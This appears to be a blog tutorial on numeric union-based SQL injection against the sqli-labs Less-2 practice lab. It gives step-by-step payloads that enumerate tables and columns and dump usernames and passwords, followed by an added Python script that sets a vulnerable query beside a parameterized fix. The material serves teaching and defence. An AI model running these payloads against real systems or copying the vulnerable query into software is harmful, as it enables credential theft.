SQL injection - numeric union-based injection

Table of contents

Step 1: Determine whether the injection is numeric or character-based

Step 2: Use group by with binary search to determine the number of columns in the query before the union

Step 3: Refine the statement by changing the id to a number that does not exist

Step 4: Use a select statement to query the target machine's database name

Step 5: Use a select statement to query all table names on the target machine

Step 6: Use a select statement to query all column names on the target machine

Step 7: Query all usernames and passwords

Take Less-2 in sqli-labs as an example:


Step 1: Determine whether the injection is numeric or character-based

Enter a single quote (') to check for an injection point; if the page reports an error, there is one:

?id=1'

Use an and condition to determine whether the parameter is numeric or character-based.

and 1=1 displays normally:

and 1=2 does not display normally:


So this is numeric injection.

Step 2: Use group by with binary search to determine the number of columns in the query before the union

Because this is numeric injection, there is no quote to close, so the closing method does not need to be considered at all.

?id=1 order by 3 --+

Step 3: Refine the statement by changing the id to a number that does not exist

Why this is done:

By default the page only shows the result of the first statement, the one before the union. If the id is changed to a number that does not exist, the first statement returns no row, so the row produced by the statement after the union is displayed instead.

?id=-1 union select 1,2,3  --+


Step 4: Use the select statement to query the database name of the target machine

?id=-1 union select 1,2,database()  --+

Step 5: Use the select statement to query all table names of the target machine

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()  --+

Step 6: Use the select statement to query all the column names of the target machine

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'  --+

Step 7: Query all usernames and passwords

?id=-1 union select 1,group_concat(username,'~',password),3 from users  --+
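The following is an added example, not part of the original post or of sqli-labs: it reproduces the numeric injection point behind Less-2 as a small Python/SQLite script and places it beside a hardened version that validates the type and binds the id as a parameter. The users table and its rows are constructed sample data, and the Step 3 and Step 7 payloads are adapted to SQLite syntax (its group_concat takes one expression, so the '~' separator is added with ||; information_schema and database() do not exist in SQLite).

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the lab's users table (sample rows, not the lab's own).
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 's3cret'), (2, 'bob', 'hunter2');
    """)
    return conn


def lookup_vulnerable(conn, user_id):
    # The numeric injection point: id is spliced into the SQL text without quotes,
    # so, as the walkthrough notes, nothing has to be "closed" before a union.
    sql = f"SELECT id, username, password FROM users WHERE id={user_id} LIMIT 1"
    return conn.execute(sql).fetchone()


def lookup_hardened(conn, user_id):
    # Fix: enforce the expected type, then bind the value as a parameter.
    # The database receives the id as data, never as part of the SQL text.
    if not isinstance(user_id, int):
        try:
            user_id = int(str(user_id).strip())
        except ValueError:
            return None  # reject anything that is not a plain integer
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchone()


# Step 3 (column probe) and Step 7 (dump) payloads from the walkthrough, SQLite syntax.
# The trailing "-- " comments out the " LIMIT 1" that follows in the vulnerable query.
PAYLOAD_PROBE = "-1 union select 1,2,3 -- "
PAYLOAD_DUMP = "-1 union select 1,group_concat(username||'~'||password),3 from users -- "


def demo():
    conn = make_db()
    return {
        "vuln_probe": lookup_vulnerable(conn, PAYLOAD_PROBE),   # (1, 2, 3)
        "vuln_dump": lookup_vulnerable(conn, PAYLOAD_DUMP),     # all credentials in column 2
        "hard_probe": lookup_hardened(conn, PAYLOAD_PROBE),     # None: rejected
        "hard_dump": lookup_hardened(conn, PAYLOAD_DUMP),       # None: rejected
        "hard_normal": lookup_hardened(conn, "1"),              # (1, 'alice', 's3cret')
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name}: {row}")
```

The vulnerable function shows the union row replacing the missing id=-1 row exactly as Step 3 describes, while the hardened function returns None for both payloads and still serves a legitimate numeric id.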


Origin blog.csdn.net/heyingcheng/article/details/129344827